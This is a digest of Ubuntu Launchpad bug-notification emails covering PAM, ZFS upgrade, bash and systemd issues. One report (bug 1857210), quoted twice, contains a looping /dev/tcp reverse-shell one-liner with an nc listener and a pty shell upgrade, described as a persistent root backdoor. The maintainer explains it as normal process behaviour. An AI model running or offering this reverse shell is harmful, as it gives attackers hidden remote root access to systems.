[Touch-packages] [Bug 1860826] Re: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

[Seth Arnold]

** Tags added: champagne

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1860826

Title:
  pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or
  directory

Status in pam package in Ubuntu:
  New

Bug description:
  Hello, after upgrading to focal I found the following in my journalctl
  output:

  Jan 24 23:07:00 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory
  Jan 24 23:07:01 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory

  
  The login package stopped packaging this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=731656
  and now forcibly removes the file:
  https://paste.ubuntu.com/p/myh9cGWrHD/

  However, the pam package's pam_unix.so module has not yet been adapted to 
ignore this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674857#25

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: libpam-modules 1.3.1-5ubuntu4
  ProcVersionSignature: Ubuntu 5.4.0-9.12-generic 5.4.3
  Uname: Linux 5.4.0-9-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu15
  Architecture: amd64
  Date: Fri Jan 24 23:35:33 2020
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: pam
  UpgradeStatus: Upgraded to focal on 2020-01-24 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1860826/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1860826] [NEW] pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

[Seth Arnold]

Public bug reported:

Hello, after upgrading to focal I found the following in my journalctl
output:

Jan 24 23:07:00 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory
Jan 24 23:07:01 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory


The login package stopped packaging this file:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=731656
and now forcibly removes the file:
https://paste.ubuntu.com/p/myh9cGWrHD/

However, the pam package's pam_unix.so module has not yet been adapted to 
ignore this file:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674857#25

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 20.04
Package: libpam-modules 1.3.1-5ubuntu4
ProcVersionSignature: Ubuntu 5.4.0-9.12-generic 5.4.3
Uname: Linux 5.4.0-9-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.11-0ubuntu15
Architecture: amd64
Date: Fri Jan 24 23:35:33 2020
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: pam
UpgradeStatus: Upgraded to focal on 2020-01-24 (0 days ago)

** Affects: pam (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug focal

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1860826

Title:
  pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or
  directory

Status in pam package in Ubuntu:
  New

Bug description:
  Hello, after upgrading to focal I found the following in my journalctl
  output:

  Jan 24 23:07:00 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory
  Jan 24 23:07:01 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory

  
  The login package stopped packaging this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=731656
  and now forcibly removes the file:
  https://paste.ubuntu.com/p/myh9cGWrHD/

  However, the pam package's pam_unix.so module has not yet been adapted to 
ignore this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674857#25

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: libpam-modules 1.3.1-5ubuntu4
  ProcVersionSignature: Ubuntu 5.4.0-9.12-generic 5.4.3
  Uname: Linux 5.4.0-9-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu15
  Architecture: amd64
  Date: Fri Jan 24 23:35:33 2020
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: pam
  UpgradeStatus: Upgraded to focal on 2020-01-24 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1860826/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

[Seth Arnold]

My machine did not reboot successfully; because I followed The Guide, my
system has a root password, and I was prompted for it at the systemd
emergency shell. (Which is super-confusing, because I forgot I had set a
password.)

The error message appeared to be along the lines of "bpool failed to
import because it was most recently used on another machine". (This is a
lie; rpool, on the same nvme, didn't say the same thing.)

I was able to proceed again after a 'zpool import -f bpool', reboot, and
then things seemed to work well.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1860762

Title:
  Upgrade with zfs-on-root failures

Status in initramfs-tools package in Ubuntu:
  New
Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  I followed rlaager's howto for installing Ubuntu 18.04 LTS with ZFS
  root (but used disco). I've also set up sanoid to perform periodic
  snapshots of bpool (which stores /boot).

  The upgrade from disco to eoan didn't go well:

  [.. trimmed to fit in the comment box; more context in attachment ..]

  /ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found linux image: vmlinuz-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Adding boot menu entry for EFI firmware configuration
  done
  Processing triggers for dbus (1.12.14-1ubuntu2) ...
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Processing triggers for shim-signed (1.39+15+1533136590.3beb971-0ubuntu1) ...
  Nothing to do.
  Processing triggers for libgdk-pixbuf2.0-0:amd64 (2.40.0+dfsg-1build1) ...
  Errors were encountered while processing:
   initramfs-tools
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an 
error code (1)

  Could not install the upgrades

  The upgrade has aborted. Your system could be in an unusable state. A 
  recovery will run now (dpkg --configure -a). 

  Setting up initramfs-tools (0.133ubuntu10) ...
  update-initramfs: deferring update (trigger activated)
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  ERROR: Cannot create report: [Errno 17] File exists: 
'/var/crash/initramfs-tools.0.crash'
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Errors were encountered while processing:
   initramfs-tools

  Upgrade complete

  The upgrade has completed but there were errors during the upgrade 
  process. 

  To continue please press [ENTER]

  ProblemType: Bug
  DistroRelease: Ubuntu 19.10
  Package: ubuntu-release-upgrader-core 1:19.10.15.4
  ProcVersionSignature: Ubuntu 5.0.0-40.44-generic 5.0.21
  Uname: Linux 5.0.0-40-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu8.3
  Architecture: amd64
  CrashDB: ubuntu
  Date: Fri Jan 24 06:02:32 2020
  PackageArchitecture: all
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: ubuntu-release-upgrader
  UpgradeStatus: Upgraded to eoan on 2020-01-24 (0 days ago)
  VarLogDistupgradeAptclonesystemstate.tar.gz:
   Error: command ['pkexec', 'cat', 
'/var/log/dist-upgrade/apt-clone_system_state.tar.gz'] failed with exit 

[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

[Seth Arnold]

I was able to fix this error:

 E: mkinitramfs failure cpio 141 lz4 -9 -l 24

by deleting the snapshots that sanoid made *during* the installation
process:

sarnold@millbarge:/boot$ sudo zfs destroy 
bpool@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
[sudo] password for sarnold: 
sarnold@millbarge:/boot$ sudo zfs destroy 
bpool/BOOT@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
sarnold@millbarge:/boot$ sudo zfs destroy 
bpool/BOOT/ubuntu@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
sarnold@millbarge:/boot$ df -h .
Filesystem Size  Used Avail Use% Mounted on
bpool/BOOT/ubuntu  365M  156M  210M  43% /boot
sarnold@millbarge:/boot$ sudo dpkg --configure -a
Setting up initramfs-tools (0.133ubuntu10) ...
update-initramfs: deferring update (trigger activated)
Processing triggers for initramfs-tools (0.133ubuntu10) ...
update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
cryptsetup: WARNING: Couldn't determine root device
sarnold@millbarge:/boot$ 


Considering sanoid is not packaged in Ubuntu, there may not be anything that 
do-release-upgrade or initramfs-tools can do differently.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1860762

Title:
  Upgrade with zfs-on-root failures

Status in initramfs-tools package in Ubuntu:
  New
Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  I followed rlaager's howto for installing Ubuntu 18.04 LTS with ZFS
  root (but used disco). I've also set up sanoid to perform periodic
  snapshots of bpool (which stores /boot).

  The upgrade from disco to eoan didn't go well:

  [.. trimmed to fit in the comment box; more context in attachment ..]

  /ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found linux image: vmlinuz-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Adding boot menu entry for EFI firmware configuration
  done
  Processing triggers for dbus (1.12.14-1ubuntu2) ...
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Processing triggers for shim-signed (1.39+15+1533136590.3beb971-0ubuntu1) ...
  Nothing to do.
  Processing triggers for libgdk-pixbuf2.0-0:amd64 (2.40.0+dfsg-1build1) ...
  Errors were encountered while processing:
   initramfs-tools
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an 
error code (1)

  Could not install the upgrades

  The upgrade has aborted. Your system could be in an unusable state. A 
  recovery will run now (dpkg --configure -a). 

  Setting up initramfs-tools (0.133ubuntu10) ...
  update-initramfs: deferring update (trigger activated)
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  ERROR: Cannot create report: [Errno 17] File exists: 
'/var/crash/initramfs-tools.0.crash'
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Errors were encountered while processing:
   initramfs-tools

  Upgrade complete

  The upgrade has completed but there were errors during the upgrade 
  process. 

  To continue please press [ENTER]

  ProblemType: Bug
  DistroRelease: Ubuntu 19.10
  

[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

[Seth Arnold]

I'm surprised the snapshots showed up, I've got the snapdirs hidden:

$ zfs list -oname,snapdir
NAME   SNAPDIR
bpool   hidden
bpool/BOOT  hidden
bpool/BOOT/ubuntu   hidden
rpool   hidden
rpool/ROOT  hidden
rpool/ROOT/ubuntu   hidden
rpool/home  hidden
rpool/home/root hidden
rpool/home/sarnold  hidden
rpool/swap   -
rpool/tmp   hidden
rpool/usr   hidden
rpool/usr/local hidden
rpool/var   hidden
rpool/var/cache hidden
rpool/var/lib   hidden
rpool/var/lib/AccountsService   hidden
rpool/var/lib/dockerhidden
rpool/var/lib/nfs   hidden
rpool/var/lib/schroot   hidden
rpool/var/log   hidden
rpool/var/mail  hidden
rpool/var/snap  hidden
rpool/var/spool hidden
rpool/var/tmp   hidden
rpool/var/www   hidden


** Also affects: initramfs-tools (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1860762

Title:
  Upgrade with zfs-on-root failures

Status in initramfs-tools package in Ubuntu:
  New
Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  I followed rlaager's howto for installing Ubuntu 18.04 LTS with ZFS
  root (but used disco). I've also set up sanoid to perform periodic
  snapshots of bpool (which stores /boot).

  The upgrade from disco to eoan didn't go well:

  [.. trimmed to fit in the comment box; more context in attachment ..]

  /ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found linux image: vmlinuz-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-39-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-40-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in 
rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Adding boot menu entry for EFI firmware configuration
  done
  Processing triggers for dbus (1.12.14-1ubuntu2) ...
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Processing triggers for shim-signed (1.39+15+1533136590.3beb971-0ubuntu1) ...
  Nothing to do.
  Processing triggers for libgdk-pixbuf2.0-0:amd64 (2.40.0+dfsg-1build1) ...
  Errors were encountered while processing:
   initramfs-tools
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an 
error code (1)

  Could not install the upgrades

  The upgrade has aborted. Your system could be in an unusable state. A 
  recovery will run now (dpkg --configure -a). 

  Setting up initramfs-tools (0.133ubuntu10) ...
  update-initramfs: deferring update (trigger activated)
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  ERROR: Cannot create report: [Errno 17] File exists: 
'/var/crash/initramfs-tools.0.crash'
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess 
returned error exit status 1
  Errors were encountered while processing:
   initramfs-tools

  Upgrade complete

  The upgrade has completed but there were errors during the upgrade 
  process. 

  To continue please press [ENTER]

  ProblemType: Bug
  DistroRelease: Ubuntu 19.10
  Package: ubuntu-release-upgrader-core 

[Touch-packages] [Bug 1857210] Re: process does not close when shell is killed

[Seth Arnold]

Hello Mitch, excellent report, thanks.

This is working as intended.

The Unix process model is complicated, and Linux has added a few
additional complications on top; I'll try to summarize it but it's just
not going to be easy.

When a parent process exits, child processes are not notified by
default. The prctl(2) syscall allows a process to be informed when its
parent exits. There is no easy mechanism for grand-children to be
informed when a grand-parent process exits.

bash will send signals to all currently running jobs when it exits. (You
can ask bash to skip sending a signal to a job by using the 'disown'
shell built-in.) These signals can only be sent if bash continues to run
when exiting -- using 'kill -9' in your example above prevents bash from
sending signals to its children because a process cannot handle SIGKILL.
Try it again with SIGHUP instead of SIGKILL. Processes can ignore or
block the SIGHUP signal that bash will send.

It is expected that killing a parent process may not influence child
processes. If you want to kill a process that has a socket open, you
should kill that process directly. ss(8), lsof(8), fuser(1), etc can
report which processes are using a given socket.

For more details check the signal(7) manpage, bash(1) manpage near
'disown', the prctl(2) manpage near 'PR_SET_PDEATHSIG'. The book
Advanced Programming in the Unix Environment also has an excellent
description of the Unix process lifecycle.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1857210

Title:
  process does not close when shell is killed

Status in bash package in Ubuntu:
  Invalid

Bug description:
  [*] As root user only - use your attacker IP and port of your choice.

  [*] Victim server/client
  while true; do
  0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
  sleep 30
  done

  
  [*] Attacker Machine
  nc -lvnp 80 #  Or whatever port you plugged into the while loop

  
  Once the while loop is executed, you can close the shell (do not kill with 
Control+C) and the while loop will continue to run. You can attempt to run a 
"Kill -9" on the pid but the thread below will take over as running process. 
This leaves a hard to detect reverse shell since the while loop continues to 
run and executes a rooted backdoor call every 30 seconds. Example below:

  [*] Victim
  root@app-server:~# while true; do
  > 0<&196;exec 196<>/dev/tcp/192.168.1.111/9000; sh <&196 >&196 2>&196
  > sleep 30
  > done
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor


  
  [*] Attacker Machine
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41640 received!
  whoami
  root

  
  * Now we close out the terminal on the Victim machine

  We can see the call continues:
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41644 received!
  whoami
  root
  python -c 'import pty; pty.spawn("/bin/bash")'
  root@app-server:~# 

  
  Now checking the Victim process, we can see the process, let's kill it:
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1323 1  0 17:42 ?00:00:00 su
  root  1324  1323  0 17:42 ?00:00:00  \_ bash
  root  1346  1324  0 17:46 ?00:00:00  \_ sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import 
pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  codonnell@app-server:~$ kill -9 1323
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1324 1  0 17:42 ?00:00:00 bash
  root  1346  1324  0 17:46 ?00:00:00  \_ sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import pty; 
pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  codonnell@app-server:~$ sudo kill -9 1324
  [sudo] password for codonnell: 
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1346 1  0 17:46 ?00:00:00 sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import pty; 
pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  
  We can see the below thread moves up the chain. All while I am on the system:

  codonnell@app-server:~$ sudo kill -9 1346
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1350 1  0 17:46 ?00:00:00 python -c import pty; 

[Touch-packages] [Bug 1857210] Re: process does not close when shell is killed

[Seth Arnold]

** Information type changed from Private Security to Public

** Changed in: bash (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1857210

Title:
  process does not close when shell is killed

Status in bash package in Ubuntu:
  Invalid

Bug description:
  [*] As root user only - use your attacker IP and port of your choice.

  [*] Victim server/client
  while true; do
  0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
  sleep 30
  done

  
  [*] Attacker Machine
  nc -lvnp 80 #  Or whatever port you plugged into the while loop

  
  Once the while loop is executed, you can close the shell (do not kill with 
Control+C) and the while loop will continue to run. You can attempt to run a 
"Kill -9" on the pid but the thread below will take over as running process. 
This leaves a hard to detect reverse shell since the while loop continues to 
run and executes a rooted backdoor call every 30 seconds. Example below:

  [*] Victim
  root@app-server:~# while true; do
  > 0<&196;exec 196<>/dev/tcp/192.168.1.111/9000; sh <&196 >&196 2>&196
  > sleep 30
  > done
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor


  
  [*] Attacker Machine
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41640 received!
  whoami
  root

  
  * Now we close out the terminal on the Victim machine

  We can see the call continues:
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41644 received!
  whoami
  root
  python -c 'import pty; pty.spawn("/bin/bash")'
  root@app-server:~# 

  
  Now checking the Victim process, we can see the process, let's kill it:
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1323 1  0 17:42 ?00:00:00 su
  root  1324  1323  0 17:42 ?00:00:00  \_ bash
  root  1346  1324  0 17:46 ?00:00:00  \_ sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import 
pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  codonnell@app-server:~$ kill -9 1323
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1324 1  0 17:42 ?00:00:00 bash
  root  1346  1324  0 17:46 ?00:00:00  \_ sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import pty; 
pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  codonnell@app-server:~$ sudo kill -9 1324
  [sudo] password for codonnell: 
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1346 1  0 17:46 ?00:00:00 sh
  root  1350  1346  0 17:46 ?00:00:00  \_ python -c import pty; 
pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  
  We can see the below thread moves up the chain. All while I am on the system:

  codonnell@app-server:~$ sudo kill -9 1346
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1350 1  0 17:46 ?00:00:00 python -c import pty; 
pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/200:00:00  \_ /bin/bash

  codonnell@app-server:~$ sudo kill -1350
  codonnell@app-server:~$ ps -aef --forest | less

  The kill -9 is now killed the Attacker shell and the while loop has
  ended.

  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41644 received!
  whoami
  root
  python -c 'import pty; pty.spawn("/bin/bash")'
  root@app-server:~#

  
  My guess is that killing the root process should remove the below threads to 
avoid a continuous open backdoor on the server. 

  Tested on RHEL as well, this seems to be specific to the Bash package.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: bash 4.4.18-2ubuntu1.2
  ProcVersionSignature: Ubuntu 4.15.0-72.81-generic 4.15.18
  Uname: Linux 4.15.0-72-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.9
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Sat Dec 21 17:34:54 2019
  InstallationDate: Installed on 2019-01-31 (324 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: bash
  UpgradeStatus: No upgrade log present 

[Touch-packages] [Bug 1853164] Re: systemd: /etc/dhcp/dhclient-enter-hooks.d/resolved error

[Seth Arnold]

I thought we were going to some effort to reduce the number of systems
where resolveconf was going to be used, or even remove it from the
distro entirely.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1853164

Title:
  systemd: /etc/dhcp/dhclient-enter-hooks.d/resolved error

Status in systemd package in Ubuntu:
  Triaged
Status in systemd source package in Focal:
  Triaged

Bug description:
  The functionality exists to allow users to revert to the traditional ifupdown 
  package for network configuration. Alongside this, systemd's often-buggy 
  resolver can be disabled. However, there's a logic error in the systemd-
  supplied /etc/dhcp/dhclient-enter-hooks.d/resolved that prevents the system
  from populating /etc/resolv.conf properly when systemd-resolved is disabled. 
  The issue is here:

  if [ -x /lib/systemd/systemd-resolved ] ; then

  Instead of checking to see if the systemd-resolved service is enabled or 
  active, which would be the correct behaviour, this checks for the existence of
  a binary, assuming that if it exists it's supposed to be used.

  I've not tested this in the absence of resolvconf, but if systemd-resolved 
  isn't enabled, it's difficult to imagine this code wanting to run. I've 
tested 
  this with resolvconf and ifupdown driving dhclient, and it corrects the 
  behaviour that was broken with the introduction of systemd-resolved.

  I'm attaching a patch, and am also including it here for easy access:

  *** resolved.broken 2019-11-19 15:01:28.785588838 +
  --- resolved2019-11-19 15:08:06.519430073 +
